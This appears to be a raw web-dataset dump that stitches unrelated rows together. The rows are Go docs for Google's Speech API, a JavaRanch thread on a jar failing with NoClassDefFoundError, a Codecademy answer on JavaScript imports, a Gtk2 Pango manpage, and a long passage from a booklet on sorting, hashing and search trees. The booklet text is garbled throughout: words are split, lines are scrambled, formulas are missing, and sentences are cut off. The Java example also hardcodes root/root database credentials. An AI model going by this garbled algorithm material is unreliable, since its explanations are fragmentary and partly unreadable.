text
stringlengths
20
1.01M
url
stringlengths
14
1.25k
dump
stringlengths
9
15
lang
stringclasses
4 values
source
stringclasses
4 values
import "cloud.google.com/go/speech/apiv1beta1" Package speech is an experimental, auto-generated package for the speech API. Google Cloud Speech API. AsyncRecognizeOperation manages a long-running operation from AsyncRecognize. func (op *AsyncRecognizeOperation) Done() bool Done reports whether the long-running operation has completed. func (op *AsyncRecognizeOperation) Metadata() (*speechpb.AsyncRecogn (op *AsyncRecognizeOperation) Name() string Name returns the name of the long-running operation. The name is assigned by the server and is unique within the service from which the operation is created. func (op *AsyncRecognizeOperation) Poll(ctx context.Context) (*speechpb.AsyncRecogn (op *AsyncRecognizeOperation) Wait(ctx context.Context) (*speechpb.AsyncRecognizeResponse, error) Wait blocks until the long-running operation is completed, returning the response and any errors encountered. See documentation of Poll for error-handling information. type CallOptions struct { SyncRecognize []gax.CallOption AsyncRecognize []gax.CallOption StreamingRecognize []gax.CallOption } CallOptions contains the retry settings for each method of Client. type Client struct { // The call options for this service. CallOptions *CallOptions // contains filtered or unexported fields } Client is a client for interacting with Google Cloud Speech API. NewClient creates a new speech client. Service that implements Google Cloud Speech API. func (c *Client) AsyncRecognize(ctx context.Context, req *speechpb.AsyncRecognizeRequest, opts ...gax.CallOption) (*AsyncRecognizeOperation, error) AsyncRecognize performs asynchronous speech recognition: receive results via the [google.longrunning.Operations] (/speech/reference/rest/v1beta1/operations#Operation) interface. Returns either an `Operation.error` or an `Operation.response` which contains an `AsyncRecognizeResponse` message. Code: ctx := context.Background() c, err := speech.NewClient(ctx) if err != nil { // TODO: Handle error. } req := &speechpb.AsyncRecognizeRequest{ // TODO: Fill request struct fields. } op, err := c.AsyncRecognize(ctx, req) if err != nil { // TODO: Handle error. } resp, err := op.Wait(ctx) if err != nil { // TODO: Handle error. } // TODO: Use resp. _ = resp func (c *Client) AsyncRecognizeOperation(name string) *AsyncRecognizeOperation AsyncRecognizeOperation returns a new AsyncRecognizeOperation from a given name. The name must be that of a previously created AsyncRecognizeOperation, possibly from a different process. Close closes the connection to the API service. The user should invoke this when the client is no longer required. func (c *Client) Connection() *grpc.ClientConn Connection returns the client's connection to the API service. SetGoogleClientInfo sets the name and version of the application in the `x-goog-api-client` header passed on each request. Intended for use by Google-written clients. } func (c *Client) SyncRecognize(ctx context.Context, req *speechpb.SyncRecognizeRequest, opts ...gax.CallOption) (*speechpb.SyncRecognizeResponse, error) SyncRecognize performs synchronous speech recognition: receive results after all audio has been sent and processed. Code: ctx := context.Background() c, err := speech.NewClient(ctx) if err != nil { // TODO: Handle error. } req := &speechpb.SyncRecognizeRequest{ // TODO: Fill request struct fields. } resp, err := c.SyncRecognize(ctx, req) if err != nil { // TODO: Handle error. } // TODO: Use resp. _ = resp Package speech imports 12 packages (graph) and is imported by 1 packages. Updated 2017-05-19. Refresh now. Tools for package owners.
https://godoc.org/cloud.google.com/go/speech/apiv1beta1
CC-MAIN-2017-22
en
refinedweb
: Beginning Java Unable to execute jar file....got following stack trace. Jigar Naik Ranch Hand Posts: 763 posted 12 years ago Hi, i'm using jasper report for generating report. following is my java class for displaying report, package com.india.mumbai.tg; import net.sf.jasperreports.view.JasperViewer; import net.sf.jasperreports.engine.xml.JRXmlLoader; import net.sf.jasperreports.engine.JasperCompileManager; import net.sf.jasperreports.engine.JasperFillManager; import net.sf.jasperreports.engine.JasperPrint; import net.sf.jasperreports.engine.design.JasperDesign; import net.sf.jasperreports.engine.JasperReport; import java.io.OutputStream; import java.sql.DriverManager; import com.mysql.jdbc.Connection; /** * Driver program to connect to a database and to view a jasper report (.jrxml) * @author Oguzhan Topsakal * @since 23 March 2006 * * Required jar files to run this class: * 1. jasperreports-1.2.0.jar * 2. classes12.jar (for Oracle JDBC connection) * 3. commons-beanutils-1.5.jar * 4. commons-collections-2.1.jar * 5. commons-digester-1.7.jar * 6. commons-logging-1.0.2.jar * */ public class ReportDriver { /** * Takes 3 parameters: databaseName, userName, password * and connects to the database. * @param databaseName holds database name, * @param userName holds user name * @param password holds password to connect the database, * @return Returns the JDBC connection to the database */ public static Connection connectDB(String databaseName, String userName, String password) { Connection jdbcConnection = null; try{ //Class.forName(connectionClass); //Connection conn = DriverManager.getConnection(connectionName); Class.forName("com.mysql.jdbc.Driver"); jdbcConnection = (Connection)DriverManager.getConnection("jdbc:mysql://localhost:3306/utility?user=root&password=root"); }catch(Exception ex) { String connectMsg = "Could not connect to the database: " + ex.getMessage() + " " + ex.getLocalizedMessage(); System.out.println(connectMsg); } return jdbcConnection; } /** * Takes 4 parameters: databaseName, userName, password, reportFileLocation * and connects to the database and prepares and views the report. * @param databaseName holds database name, * @param userName holds user name * @param password holds password to connect the database, * @param reportFile holds the location of the Jasper Report file (.jrxml) */ public static void runReport() { try{ String reportFile = "contactReport.jrxml"; JasperDesign jasperDesign = JRXmlLoader.load(reportFile); JasperReport jasperReport = JasperCompileManager.compileReport(jasperDesign); Class.forName("com.mysql.jdbc.Driver"); Connection jdbcConnection = (Connection)DriverManager.getConnection("jdbc:mysql://localhost:3306/utility?user=root&password=root"); JasperPrint jasperPrint = JasperFillManager.fillReport(jasperReport, null, jdbcConnection); JasperViewer.viewReport(jasperPrint); }catch(Exception ex) { String connectMsg = "Could not create the report " + ex.getMessage() + " " + ex.getLocalizedMessage(); System.out.println(connectMsg); } } /** * Uses runReport method to connect to the database and to prepare and view the report. * @param args Takes 4 arguments as an input: databaseName, userName, password, reportFileLocation * args[0] holds database name, * args[1] holds user name * args[2] holds password to connect the database, * args[3] holds the location of the Jasper Report file (.jrxml) */ public static void main(String[] args) { runReport(); } } i have created jar(JR.jar) file the entry of MANIFEST.MF Manifest-Version: 1.0 Sealed: true Main-Class: com.india.mumbai.tg.ReportDriver when i double click on JR.jar file it gives me the following error Could not find the main class. Program will exit. I have tested the Jr.jar file with following command and got the following stack trace C:\Program Files\Java\jdk1.6.0\bin>java -jar JR.jar Exception in thread "main" java.lang.NoClassDefFoundError: net/sf/jasperreports/engine/design/JasperDesign i'm also bundeling all the requeired jar file in my JR.jar file jasperreports-1.2.0.jar, commons-beanutils-1.5.jar, commons-collections-2.1.jar, commons-digester-1.7.jar, commons-logging-1.0.2.jar. I'm using JBoss Eclipse IDE 1.6, Jasper Assist for creating jasper report. and i have tried to create jar file from dos as well as IDE but getting the same error. can anybody help me out ??? Jigar Naik Maurizio Nagni Ranch Hand Posts: 75 posted 12 years ago You cannot include jars in a jar. The classloaders will not find classes inside of multiple jars. To do this, you'll need to write ( or find) a custom classloader or better add classes to your JAR File's Classpath according to Paul Sturrock Bartender Posts: 10336 I like... posted 12 years ago Not an advanced question. Moving... JavaRanch FAQ HowToAskQuestionsOnJavaRanch Jesper de Jong Java Cowboy Posts: 16084 88 I like... posted 12 years ago Also make sure that your manifest file ends with an empty line, otherwise the last line in the manifest file will not be parsed correctly. See this page , which says: "Warning: The text file from which you are creating the manifest must end with a new line or carriage return. The last line will not be parsed properly if it does not end with a new line or carriage return." Jesper's Blog - Pluralsight Author Page it's a teeny, tiny, wafer thin ad: Java file APIs (DOC, XLS, PDF, and many more) Post Reply Bookmark Topic Watch Topic New Topic Boost this thread! Similar Threads unable to read file from war file tomcat connection Unable to execute jar file....got following stack trace. jasper report- error org.xml.saxSAXNotRecognEx More...
https://coderanch.com/t/406700/java/Unable-execute-jar-file-stack
CC-MAIN-2019-47
en
refinedweb
Question What are some use cases for using named imports with the import keyword (to import a default export)? Answer We can combine named imports with the import statement (to import a default export) for the same reasons we would combine named exports and default exports. Generally, this includes importing the expected export of a module, the default export, importing any utility exports that may not be necessary but could come in handy, the named exports, and/or importing pieces of a module that are the internals of a private variable without exposing the entire private variable (again these would be named exports).
https://discuss.codecademy.com/t/what-are-some-use-cases-for-using-named-imports-with-the-import-keyword-to-import-a-default-export/385675
CC-MAIN-2019-47
en
refinedweb
The QUsbStorageGadget class is used to enable mass storage class of USB gadgets. More... #include <QUsbStorageGadget> Inherits QUsbGadget. Inherited by QUsbStorageGadgetProvider. The QUsbStorageGadget class is used to enable mass storage class of USB gadgets. The QUsbStorageGadget class is used to configure the USB gadget hardware as a USB mass storage device. The following code will export the block device, /dev/sda. QUsbStorageGadget *storage = QUsbStorageGadget; if (gadget->available()) { connect(gadget, SIGNAL(activated()), this, SLOT(storageActivated())); gadget->setBackingStore(QStringList() << "/dev/sda"); gadget->activate(); } Warning: Filesystem drivers in most operating systems expect exclusive access to the underlying block device. Any modification to the on disk data structures that do not go through the filesystem layer can result in data losses and system crashes. Therefore it is important that the backing store block devices are unmounted prior to activating the USB storage gadget. See also QUsbManager and UsbGadgetTask. Constructs a new QUsbStorageGadget object in group and attach it to parent. If mode is Client, then the object is constructed in client mode and group may be empty to indicate that the default group should be used. Adds device path to the list of backing stores. Returns the list of devices that will be used as the backing store. See also setBackingStore(). Removes device path from the list of backing stores. Sets the list of backing store devices to paths. See also backingStore().
https://doc.qt.io/archives/qtextended4.4/qusbstoragegadget.html
CC-MAIN-2019-47
en
refinedweb
Provided by: libgtk2-perl-doc_1.24992-1build2_all NAME Gtk2::Pango::AttrScale - backwards compatibility wrapper for Pango::AttrScale DESCRIPTION As of Gtk2 1.220, pango bindings are provided by the standalone Pango module. This namespace is provided for backwards compatibility. The relevant documentation moved to Pango and is linked to below. SEE ALSO Gtk2, Pango::AttrScale Copyright (C) 2003-2011 by the gtk2-perl team. This software is licensed under the LGPL. See Gtk2 for a full notice.
http://manpages.ubuntu.com/manpages/disco/man3/Gtk2::Pango::AttrScale.3pm.html
CC-MAIN-2019-47
en
refinedweb
2. Sorting 2.1 Insertion Sort 2.2 Shell Sort 2.3 Quicksort 2.4 Comparison of Methods 3. Dictionaries 3.1 Hash Tables 3.2 Binary Search Trees 3.3 Red-Black Trees 3.4 Skip Lists 3.5 Comparison of Methods 4. Code Listings 4.1 Insertion Sort Code 4.2 Shell Sort Code 4.3 Quicksort Code 4.4 Qsort Code 4.5 Hash Table Code 4.6 Binary Search Tree Code 4.7 Red-Black Tree Code 4.8 Skip List Code 5. Bibliography 36 50 Preface This booklet contains a collection of sorting and searching algorithms. While many books on data structures describe sorting and searching algorithms, most assume a background in calculus and probability theory. Although a formal presentation and proof of asymptotic behavior is important, a more intuitive explanation is often possible. The way each algorithm works is described in easy-to-understand terms. It is assumed that you have the knowledge equivalent to an introductory course in C or Pascal. In particular, you should be familiar with arrays and have a basic understanding of pointers. The material is presented in an orderly fashion, beginning with easy concepts and progressing to more complex ideas. Even though this collection is intended for beginners, more advanced users may benefit from some of the insights offered. In particular, the sections on hash tables and sk ip lists should prove interesting. Santa Cruz, California Thomas Niemann March, 1995 1. ore ase Introduction Arrays and linked lists are two basic data structures used to st information. We may wish to search, insert or delete records in a datab based on a key value. This section examines the performance of these operations on arrays and linked lists. Arrays ------ s. . Figure 1.1 shows an array, seven elements long, containing numeric value To search the array sequentially, we may use the algorithm in Figure 1.2 The maximum number of comparisons is 7, and occurs when the key we are searching for is in A[6]. If the data is sorted, a binary search may be done (Figure 1.3). Variables Lb and Ub keep track of the lower bound an upper bound of the array, respectively. We begin by examining the middl element of the array. If the key we are searching for is less than the middle element, then it must reside in the top half of the array. Thus, set Ub to (M 1). This restricts our next iteration through the loop to the top half of the array. In this way, each iteration halves the size the array to be searched. For example, the first iteration will leave 3 items to test. After the second iteration, there will be 1 item left to test. Thus it takes only three iterations to find any number. Figure 1.1: An Array d e we of can nd eded This is a powerful method. For example, if the array size is 1023, we narrow the search to 511 items in one comparison. Another comparison, a we're looking at only 255 elements. In fact, only 10 comparisons are ne to search an array containing 1023 elements.]. cy A similar problem arises when deleting numbers. To improve the efficien of insert and delete operations, linked lists may be used. int function SequentialSearch (Array A , int Lb , int Ub , int K begin ey ); end; Figure 1.2: Sequential Search ; int function BinarySearch (Array A , int Lb , int Ub , int Key ) begin do forever M = ( Lb + Ub )/2; if ( Key < A[M]) then Ub = M 1; else if (Key > A[M]) then Lb = M + 1; else return M ; if (Lb > Ub ) then return 1; end; Figure 1.3: Binary Search Linked Lists In Figure 1.4 we have the same values stored in a linked list. Assuming llows: pointers X and P, as shown in the figure, value 18 may be inserted as fo X->Next = P->Next; P->Next = X; be list we of Insertion (and deletion) are very efficient using linked lists. You may wondering how P was set in the first place. Well, we had to search the in a sequential fashion to find the insertion point for X. Thus, while improved our insert and delete performance, it has been at the expense search time. Figure 1.4: A Linked List Timing Estimates ne mings. that e Several methods may be used to compare the performance of algorithms. O way is simply to run several tests for each algorithm and compare the ti Another way is to estimate the time required. For example, we may state search time is O(n) (big-ohofn). This means that, for large n, search tim is no greater than the number of items n in the list. The big-O notatio not describe the exact time that an algorithm takes, but only indicates upper bound on execution time within a constant factor. If an algorithm O(n2) time, then execution time grows no worse than the square of the si the list. To see the effect this has, Table 1.1 illustrates growth rate various functions. A growth rate of O(lg n) occurs for algorithms simil the binary search. The lg (logarithm, base 2) function increases by one n is doubled. Recall that we can search twice as many items with one mo comparison in the binary search. Thus the binary search is a O(lg n) al gorithm. 1.1: Growth Rates rithm m might If the values in Table 1.1 represented microseconds, then a O(lg n) algo may take 20 microseconds to process 1,048,476 items, a O(n1.25) algorith take 33 seconds, and a O(n2) algorithm might take up to 12 days! In the following chapters a timing estimate for each algorithm, using big-O not will be included. For a more formal derivation of these formulas you ma to consult the references. Summary As we have seen, sorted arrays may be searched efficiently using a binar y search. However, we must have a sorted array to start with. In the next section various ways to sort arrays will be examined. It turns out that this is computa tionally expensive, and considerable research has been done to make sorting algor ithms as efficient as possible. t ll ion on Linked lists improved the efficiency of insert and delete operations, bu searches were sequential and time-consuming. Algorithms exist that do a three operations efficiently, and they will be the discussed in the sect dictionaries. Sorting a) n. An Insertion Sort One of the simplest methods to sort an array is sort by insertio example of an insertion sort occurs in everyday life while playi ation, y wish 1. To sort the cards in your hand you extract a card, shift the rem cards, and then insert the extracted card in the correct place. process is repeated until all the cards are in the correct seque Both average and worst-case time is O(n2). For further reading, consult Knuth[1]. Theory down n the In Figure 2.1(a) we extract the 3. Then the above elements are shifted until we find the correct place to insert the 3. This process repeats i Figure 2.1(b) for the number 1. Finally, in Figure 2.1(c), we complete sort by inserting 2 in the correct place. Assuming there are n elements in the array, we must index through n 1 en For each entry, we may need to examine and shift up to n 1 other entries For this reason, sorting is a time-consuming process. The insertion sort is an in-place sort. That is, we sort the array in-p No extra memory is required. The insertion sort is also a stable sort. Stable sorts retain the original ordering of keys when identical keys ar present in the input data. Figure 2.1: Insertion Sort Implementation An ANSI-C implementation for insertion sort may be found in Section 4.1 (page ). Typedef T and comparison operator CompGT should be altered to reflect the data stored in the table. Pointer arithmetic was used, rath than array references, for efficiency. a) Shell Sort tries. . lace. er Shell sort, developed by Donald L. Shell, is a non-stable in-place sort. ing -case Shell sort improves on the efficiency of insertion sort by quickly shift values to their destination. Average sort time is O(n1.25), while worst time is O(n1.5). For further reading, consult Knuth[1]. Theory xtract In Figure 2.2(a) we have an example of sorting by insertion. First we e 1, shift 3 and 5 down one slot, and then insert the 1. Thus, two shifts were rt the 1 = 5 required. In the next frame, two shifts are required before we can inse 2. The process continues until the last frame, where a total of 2 + 2 + shifts have been made. In Figure 2.2(b) an example of shell sort is illustrated. We begin by d an insertion sort using a spacing of two. In the first frame we examine numbers 3-1. Extracting 1, we shift 3 down one slot for a shift count o Next we examine numbers 5-2. We extract 2, shift 5 down, and then inser After sorting with a spacing of two, a final pass is made with a spacing one. This is simply the traditional insertion sort. The total shift co using shell sort is 1+1+1 = 3. By using an initial spacing larger than we were able to quickly shift values to their proper destination. Figure 2.2: Shell Sort oing f 1. t 2. of unt one, ray d to g es To implement shell sort, various spacings may be used. Typically the ar is sorted with a large spacing, the spacing reduced, and the array sorte again. On the final sort, spacing is one. Although shell sort is easy comprehend, formal analysis is difficult. In particular, optimal spacin values elude theoreticians. Knuth[1] has experimented with several valu and recommends that spacing (h) for an array of size N be based on the following formula: Thus, values of h are computed as follows: To sort 100 items we first find an hs such that hs 100. For 100 h5 is selected. Our final value (ht) is two steps lower, or h3. our sequence of h values will be 13-4-1. Once the initial h val been determined, subsequent values may be calculated using the f Implementation ). e An ANSI-C implementation of shell sort may be found in Section 4.2 (page Typedef T and comparison operator CompGT should be altered to reflect th data stored in the array. When computing h, care must be taken to avoid underflows or overflows. The central portion of the algorithm is an insertion sort with a spacing of h. To terminate the inner loop correct ly, it is necessary to compare J before decrement. Otherwise, pointer value may wrap through zero, resulting in unexpected behavior. b) rt, Quicksort there is still room for improvement. One of the most popular sorting al gorithms is quicksort. Quicksort executes in O(n lg n) on average, and O(n2) in the worst-case. However, with proper precautions, worst-case behavior i s very unlikely. Quicksort is a non-stable sort. It is not an in-place s ort as stack space is required. For further reading, consult Cormen[2]. Theory en he vot d to The quicksort algorithm works by partitioning the array to be sorted, th recursively sorting each partition. In Partition (Figure 2.3), one of t array elements is selected as a pivot value. Values smaller than the pi value are placed to the left of the pivot, while larger values are place the right. int function Partition (Array A, int Lb, int Ub); begin select a pivot from A[Lb]A[Ub]; reorder A[Lb]A[Ub] such that: all values to the left of the pivot are all values to the right of the pivot are end; return pivot position; int Ub); (A, Lb, Ub); Lb, M 1); M + 1, Ub); pivot pivot procedure QuickSort (Array A, int Lb, begin if Lb Ub then M = Partition QuickSort (A, QuickSort (A, end; Figure 2.3: Quicksort Algorithm both at is element s shown ing in In Figure 2.4(a), the pivot selected is 3. Indices are run starting at ends of the array. Index i starts on the left and selects an element th larger than the pivot, while index j starts on the right and selects an that is smaller than the pivot. These elements are then exchanged, as i in Figure 2.4(b). QuickSort recursively sorts the two subarrays, result the array shown in Figure 2.4(c). Figure 2.4: Quicksort Example orrect ordering is maintained. In this manner, QuickSort succeeds in sorting t he array. If we're lucky the pivot selected will be the median of all values, thus equally dividing the array. For a moment, let's assume that this is the case. Since the array is split in half at each step, and Partition must eventually e xamine all n elements, the run time is O(n lg n). A[Lb]). to the hat would lement call ne. O(n2) To find a pivot value, Partition could simply select the first element ( All other values would be compared to the pivot value, and placed either left or right of the pivot as appropriate. However, there is one case t fails miserably. Suppose the array was originally in order. Partition always select the lowest value as a pivot and split the array with one e in the left partition, and Ub Lb elements in the other. Each recursive to quicksort would only diminish the size of the array to be sorted by o Thus, n recursive calls would be required to do the sort, resulting in a run time. One solution to this problem is to randomly select an item as a pivot. This would make it extremely unlikely that worst-case behavior would occ ur. Implementation ion 4.3 ect e basic An ANSI-C implementation of the quicksort algorithm may be found in Sect (page). Typedef T and comparison operator CompGT should be altered to refl the data stored in the array. Several enhancements have been made to th quicksort algorithm: ior occurs ement each The center element is selected as a pivot in Partition. If the list is partially ordered, this will be a good choice. Worst-case behav when the center element happens to be the largest or smallest el time Partition is invoked. For short arrays, InsertSort is called. Due to recursion and other over quicksort is not an efficient algorithm to use on small arrays. array with fewer than 12 elements is sorted using an insertion s optimal cutoff value is not critical and varies based on the qua generated code. head, Tail recursion occurs when the last statement in a function is a call to the function itself. Tail recursion may be replaced by iteratio results in a better utilization of stack space. This has been d the second call to QuickSort in Figure 2.3. After an array is partitioned, the smallest partition is sorted first. This results in a better utilization of stack space, as short pa are quickly sorted and dispensed with. Pointer arithmetic, rather than array indices, is used for efficient exe Also included is a listing for qsort (Section 4.4, page ), an ANSI-C stan library function usually implemented with quicksort. For this implement recursive calls were replaced by explicit stack operations. Table 2.1 sh timing statistics and stack utilization before and after the enhancement were applied. b) Comparison of Methods n sort, choice In this section we will compare the sorting algorithms covered: insertio shell sort and quicksort. There are several factors that influence the of a sorting algorithm: Stable sort. Recall that a stable sort will leave identical keys in the same relative position in the sorted output. Insertion sort is algorithm covered that is stable. Space. An in-place sort does not require any extra space to accomplish task. Both insertion sort and shell sort are in-place sorts. Q requires stack space for recursion, and thus is not an in-place However, the amount required was considerably reduced by tinkeri algorithm. Time. The time required to sort a dataset can easily become astronomica (Table 1.1). Table 2.2 shows the relative timings for each metho timing tests are described below. Simplicity. The number of statements required for each algorithm may be found in Table 2.2. Simpler algorithms result in fewer programm the only its .3. The time required to sort a randomly ordered dataset is shown in Table 2 1. Dictionaries a) Hash Tables A dictionary requires that search, insert and delete operations be supported. O ne of the most effective ways to implement a dictionary is through the use of ha sh tables. Average time to search for an element is O(1), while worst-case time is O(n). Cormen[2] and Knuth[1] both contain excellent discussions on hashing. In case you decide to read more material on this topic, you may want to know s ome terminology. The technique presented here is chaining, also known as open h ashing[3]. An alternative technique, known as closed hashing[3], or open addres sing[1], is not presented. Got that? Theory A hash table is simply an array that is addressed via a hash function. For exam ple, in Figure 3.1, HashTable is an array with 8 elements. Each element is a po inter to a linked list of numeric data. The hash function for this example simp ly To insert a new item in the table, we hash the key to determine which li st the item goes on, and then insert the item at the beginning of the list. For example, to insert 11, we divide 11 by 8 giving a remainder of 3. Thus, 11 goe s on the list starting at HashTable[3]. To find a number, we hash the number an d chain down the correct list to see if it is in the table. To delete a number, we find the number and remove the node from the linked list. If the hash function is uniform, or equally distributes the data keys am ong the hash table indices, then hashing effectively subdivides the list to be s earched. Worst-case behavior occurs when all keys hash to the same index. Then we simply have a single linked list that must be sequentially scanned. Consequ ently, it is important to choose a good hash function. Several methods may be u sed to hash key values. To illustrate the techniques, I will assume unsigned ch ar is 8-bits, unsigned short int is 16-bits and unsigned long int is 32-bits. Division method (tablesize = prime). This technique was used in the preceding e xample. A HashValue, from 0 to (HashTableSize - 1), is computed by dividing the key value by the size of the hash table and taking the remainder. For example: typedef int HashIndexType; HashIndexType Hash(int Key) { return Key % HashTableSize;} Selecting an appropriate HashTableSize is important to the success of this metho d. For example, a HashTableSize of two would yield even hash values for even Ke ys, and odd hash values for odd Keys. This is an undesirable property, as all k eys would hash to the same value if they happened to be even. If HashTableSize is a power of two, then the hash function simply selects a subset of the Key bit s as the table index. To obtain a more random scattering, HashTableSize should be a prime number not too close to a power of two. Multiplication method (tablesize = 2n). The multiplication method may be used f or a HashTableSize that is a power of 2. The Key is multiplied by a constant, a nd then the necessary bits are extracted to index into the table. Knuth[1] reco mmends using the golden ratio, or , as the constant. The following definitions m ay be used for the multiplication method: /* 8-bit index */ typedef unsigned char HashIndexType; static const HashIndexType K = 158; /* 16-bit index */ typedef unsigned short int HashIndexType; static const HashIndexType K = 40503; /* 32-bit index */ typedef unsigned long int HashIndexType; static const HashIndexType K = 2654435769; /* w=bitwidth(HashIndexType), size of table=2**m */ static const int S = w - m; HashIndexType HashValue = (HashIndexType)(K * Key) >> S; For example, if HashTableSize is 1024 (210), then a 16-bit index is sufficient a nd S would be assigned a value of 16 10 = 6. Thus, we have: typedef unsigned short int HashIndexType; HashIndexType Hash(int Key) { static const HashIndexType K = 40503; static const int S = 6; return (HashIndexType)(K * Key) >> S; } Variable string addition method (tablesize = 256). To hash a variable-length st ring, each character is added, modulo 256, to a total. A HashValue, range 0-255 , is computed. typedef unsigned char HashIndexType; HashIndexType Hash(char *str) { HashIndexType h = 0; while (*str) h += *str++; return h; } Variable string exclusive-or method (tablesize = 256). This method is similar t o the addition method, but successfully distinguishes similar words and anagrams . To obtain a hash value in the range 0-255, all bytes in the string are exclus ive-or'd together. However, in the process of doing each exclusive-or, a random component is introduced. typedef unsigned char HashIndexType; unsigned char Rand8[256]; HashIndexType Hash(char *str) { unsigned char h = 0; while (*str) h = Rand8[h ^ *str++]; return h; } Rand8 is a table of 256 8-bit unique random numbers. The exact ordering is not critical. The exclusive-or method has its basis in cryptography, and is quite e ffective[4]. Variable string exclusive-or method (tablesize 65536). If we hash the string tw ice, we may derive a hash value for an arbitrary table size up to 65536. The se cond time the string is hashed, one is added to the first character. Then the t wo 8-bit hash values are concatenated together to form a 16-bit hash value. typedef unsigned short int HashIndexType; unsigned char Rand8[256]; HashIndexType Hash(char *str) { HashIndexType h; unsigned char h1, h2; if (*str == 0) return 0; h1 = *str; h2 = *str + 1; str++; while (*str) { h1 = Rand8[h1 ^ *str]; h2 = Rand8[h2 ^ *str]; str++; } /* h is in range 0..65535 */ h = ((HashIndexType)h1 << 8)|(HashIndexType)h2; /* use division method to scale */ return h % HashTableSize Assuming n data items, the hash table size should be large enough to acc ommodate a reasonable number of entries. As seen in Table 3.1, a small table si ze cons iderably reduces the length of the list to be searched. As we see in Table 3.1, there is much leeway in the choice of table size. sizetimesizetime186912892432256642145124810610244165420483322840963641581923Table 3.1: HashT Time (ms), 4096 entries Implementation An ANSI-C implementation of a hash table may be found in Section 4.5 (page ). Ty pedef T and comparison operator CompEQ should be altered to reflect the data sto red in the table. HashTableSize must be determined and the HashTable allocated. The division method was used in the Hash function. InsertNode allocates a new node and inserts it in the table. DeleteNode deletes and frees a node from the table. FindNode searches the table for a particular value. a) Binary Search Trees In Section 1g n). Worst-case behavior occurs when ordered data is inserted. In this case the search time is O(n). See Cormen[2] for a more detailed description. Theory A binary search tree is a tree where each node has a left and right child. Eith er child, or both children, may be missing. Figure 3.2 illustrates a binary sea rch tree. Assuming Key represents the value of a given node, then a binary sear ch tree also has the following property: all children to the left of the node h ave values smaller than Key, and all children to the right of the node have valu es larger than Key. The top of a tree is known as the root, and the exposed nod es at the bottom are known as leaves. In Figure 3.2, the root is node 20 and th th e left child. The second comparison finds that 16 > 7, so we traverse to the ri ght child. On the third comparison, we succeed. Each comparison results in reducing the number of items to inspect by on e-half. In this respect, the algorithm is similar to a binary search on an arra y. However, this is true only if the tree is balanced. For example, Figure 3.3 shows another tree containing the same values. While it is a binary search tre e, its behavior is more like that of a linked list, with search time increasing proportional to the number of elements stored. Insertion and Deletion Let us examine insertions in a binary search tree to determine the conditions th (Figu re 3.4). Now we can see how an unbalanced tree can occur. If the data is present ed in an ascending sequence, each node will be added to the right of the previou s node. This will create one long chain, or linked list. However, if data is p resented for insertion in a random order, then a more balanced tree is possible. Deletions are similar, but require that the binary search tree property be maintained. For example, if node 20 in Figure 3.4 is removed, it must be rep laced by node 37. This results in the tree shown in Figure 3.5. The rationale for this choice is as follows. The successor for node 20 must be chosen such th at all nodes to the right are larger. Thus, we need to select the smallest valu ed An ANSI-C implementation of a binary search tree may be found in Section 4.6 (pa ge). Typedef T and comparison operators CompLT and CompEQ should be altered to re flect the data stored in the tree. Each Node consists of Left, Right and Parent pointers designating each child and the parent. Data is stored in the Data fie ld. The tree is based at Root, and is initially NULL. InsertNode allocates a n ew node and inserts it in the tree. DeleteNode deletes and frees a node from th e tree. FindNode searches the tree for a particular value. a) Red-Black Trees Binary search trees work best when they are balanced or the path length from roo t to any leaf is within some bounds. The red-black tree algorithm is a method f or balancing trees. The name derives from the fact that each node is colored re d or black, and the color of the node is instrumental in determining the balance of the tree. During insert and delete operations, nodes may be rotated to main tain tree balance. Both average and worst-case search time is O(lg n). This is, perhaps, the most difficult section in the book. If you get gl assy-eyed looking at tree rotations, try skipping to skip lists, the next sectio n. For further reading, Cormen[2] has an excellent section on red-black trees. Theory A red-black tree is a balanced binary search tree with the following properties[ 2]: 1. Every node is colored red or black. 2. Every leaf is a NIL node, and is colored black. 3. If a node is red, then both its children are black. 4. Every simple path from a node to a descendant leaf contains the same num ber of black nodes. The number of black nodes on a path from root to leaf is known as the black heig ht of a tree. These properties guarantee that any path from the root to a leaf is no more than twice as long as any other. To see why this is true, consider a tree with a black height of two. The shortest distance from root to leaf is tw o, where both nodes are black. The longest distance from root to leaf is four, where the nodes are colored (root to leaf): red, black, red, black. It is not p ossible to insert more black nodes as this would violate property 4, the black-h eight requirement. Since red nodes must have black children (property 3), havin g two red nodes in a row is not allowed. Thus, the largest path we can construc t consists of an alternation of red-black nodes, or twice the length of a path c ontaining only black nodes. All operations on the tree must maintain the proper ties listed above. In particular, operations which insert or delete items from the tree must abide by these rules. Insertion To insert a node, we search the tree for an insertion point, and add the node to the tree. A new node will always be inserted as a leaf node at the bottom of t he tree. After insertion, the node is colored red. Then the parent of the node is examined to determine if the red-black tree properties have been violated. If necessary, we recolor the node and do rotations to balance the tree. By inserting a red node, we have preserved black-height property (proper ty 4). However, property 3 may be violated. This property states that both chi ldren of a red node must be black. While both children of the new node are blac k (they're NIL), consider the case where the parent of the new node is red. Ins erting a red node under a red parent would violate this property. There are two cases to consider: Red parent, red uncle: Figure 3.6 illustrates a red-red violation. Node X is th e newly inserted node, with both parent and uncle colored red. A simple recolor ing removes the red-red violation. After recoloring, the grandparent (node B) m ust be checked for validity, as its parent may be red. Note that this has the e ffect of propagating a red node up the tree. On completion, the root of the tre e is marked black. If it was originally red, then this has the effect of increa sing the black-height of the tree. Red parent, black uncle: Figure 3.7 illustrates a red-red violation, where the u ncle is colored black. Here the nodes may be rotated, with the subtrees adjuste d as shown. At this point the algorithm may terminate as there are no red-red c onflicts and the top of the subtree (node A) is colored black. Note that if nod e X was originally a right child, a left rotation would be done first, making th e node a left child. Each adjustment made while inserting a node causes us to travel up the tree one step. At most 1 rotation (2 if the node is a right child) will be done, as the algorithm terminates in this case. The technique for deletion is similar. Implementation An ANSI-C implementation of a red-black tree may be found in Section 4.7 (page). Typedef T and comparison operators CompLT and CompEQ should be altered to reflec t the data stored in the tree. Each Node consists of Left, Right and Parent poi nters designating each child and the parent. The node color is stored in Color, and is either Red or Black. The data is stored in the Data field. All leaf no des of the tree are Sentinel nodes, to simplify coding. The tree is based at Ro ot, and initially is a Sentinel node. InsertNode allocates a new node and inserts it in the tree. Subsequentl y, it calls InsertFixup to ensure that the red-black tree properties are maintai ned. DeleteNode deletes a node from the tree. To maintain red-black tree prope rties, DeleteFixup is called. FindNode searches the tree for a particular value . a) Skip Lists Skip lists are linked lists that allow you to skip to the correct node. Thus th e performance bottleneck inherent in a sequential scan is avoided, while inserti on and deletion remain relatively efficient. Average search time is O(lg n). W orst-case search time is O(n), but is extremely unlikely. An excellent referenc e for skip lists is Pugh[5]. Theory The indexing scheme employed in skip lists is similar in nature to the method us ed to lookup names in an address book. To lookup a 